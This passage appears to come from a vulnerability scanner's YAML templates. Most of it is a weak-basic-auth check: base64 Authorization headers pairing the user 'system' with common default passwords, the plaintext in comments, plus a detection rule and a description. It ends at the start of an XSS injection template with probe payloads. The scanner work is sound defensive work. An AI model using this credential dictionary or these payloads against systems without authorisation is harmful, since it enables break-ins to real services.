1780 | - "BASIC c3lzdGVtOnBAc3N3MHJk" #system:p@ssw0rd
1781 | - "BASIC c3lzdGVtOlBAc3N3MHJkIQ==" #system:P@ssw0rd!
1782 | - "BASIC c3lzdGVtOnBAc3N3b3Jk" #system:p@ssword
1783 | - "BASIC c3lzdGVtOnBhNTV3MHJk" #system:pa55w0rd
1784 | - "BASIC c3lzdGVtOnBhc3M=" #system:pass
1785 | - "BASIC c3lzdGVtOnBhc3N3MHJk" #system:passw0rd
1786 | - "BASIC c3lzdGVtOnBhc3N3b3Jk" #system:password
1787 | - "BASIC c3lzdGVtOnBhc3N3b3JkMTIz" #system:password123
1788 | - "BASIC c3lzdGVtOnExdzJlMw==" #system:q1w2e3
1789 | - "BASIC c3lzdGVtOnExdzJlM3I0" #system:q1w2e3r4
1790 | - "BASIC c3lzdGVtOnExdzJlM3I0dDU=" #system:q1w2e3r4t5
1791 | - "BASIC c3lzdGVtOnFhendzeGVkYw==" #system:qazwsxedc
1792 | - "BASIC c3lzdGVtOnF3ZTEyMw==" #system:qwe123
1793 | - "BASIC c3lzdGVtOnF3ZXIxMjM0" #system:qwer1234
1794 | - "BASIC c3lzdGVtOnF3ZXJ0eQ==" #system:qwerty
1795 | - "BASIC c3lzdGVtOnF3ZXJ0eTEyMw==" #system:qwerty123
1796 | - "BASIC c3lzdGVtOnJlZGhhdA==" #system:redhat
1797 | - "BASIC c3lzdGVtOnJvb3Q=" #system:root
1798 | - "BASIC c3lzdGVtOnJvb3QxMjM=" #system:root123
1799 | - "BASIC c3lzdGVtOnJvb3QxMjM0" #system:root1234
1800 | - "BASIC c3lzdGVtOnJvb3RAMTIz" #system:root@123
1801 | - "BASIC c3lzdGVtOnJvb3Ryb290" #system:rootroot
1802 | - "BASIC c3lzdGVtOnNlcnZlcg==" #system:server
1803 | - "BASIC c3lzdGVtOnN1cGVydXNlcg==" #system:superuser
1804 | - "BASIC c3lzdGVtOnN5c3RlbQ==" #system:system
1805 | - "BASIC c3lzdGVtOlRlc3Q=" #system:Test
1806 | - "BASIC c3lzdGVtOnRlc3Q=" #system:test
1807 | - "BASIC c3lzdGVtOnRlc3QxMjM=" #system:test123
1808 | - "BASIC c3lzdGVtOnRvb3I=" #system:toor
1809 | - "BASIC c3lzdGVtOnVibnQ=" #system:ubnt
1810 | - "BASIC c3lzdGVtOnVidW50dQ==" #system:ubuntu
1811 | - "BASIC c3lzdGVtOlVzZXI=" #system:User
1812 | - "BASIC c3lzdGVtOnVzZXI=" #system:user
1813 | - "BASIC c3lzdGVtOnZtd2FyZQ==" #system:vmware
1814 | - "BASIC c3lzdGVtOndlbGNvbWU=" #system:welcome
1815 | - "BASIC c3lzdGVtOnd1YmFv" #system:wubao
1816 | - "BASIC c3lzdGVtOnphcTEyd3N4" #system:zaq12wsx
1817 | - "BASIC c3lzdGVtOnp4Y3Zibg==" #system:zxcvbn
1818 | - "BASIC c3lzdGVtOnp4Y3Zibm0=" #system:zxcvbnm
1819 | - "BASIC c3lzdGVtOmNoYW5nZWl0" #system:changeit
1820 | - "BASIC YnZ0ZWNoOjIwMTQwODA4"
1821 |
1822 | detect:
1823 | - response:
1824 | - status: 200
1825 |
1826 | meta-info:
1827 | - title: "Weak basic authentication credentials"
1828 | - type: auth
1829 | - threat: 70
1830 | - description: >
1831 | This vulnerability is due to the use of predictably paired logins/passwords when accessing the service from the internet.
1832 | Do not use weak passwords, which are short, default, common or easy to guess.
1833 | - tags:
1834 | - http_auth
1835 |
--------------------------------------------------------------------------------
/xss-html-injections.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - "'STR_MARKER><"
4 | - '"STR_MARKER><'
5 | - '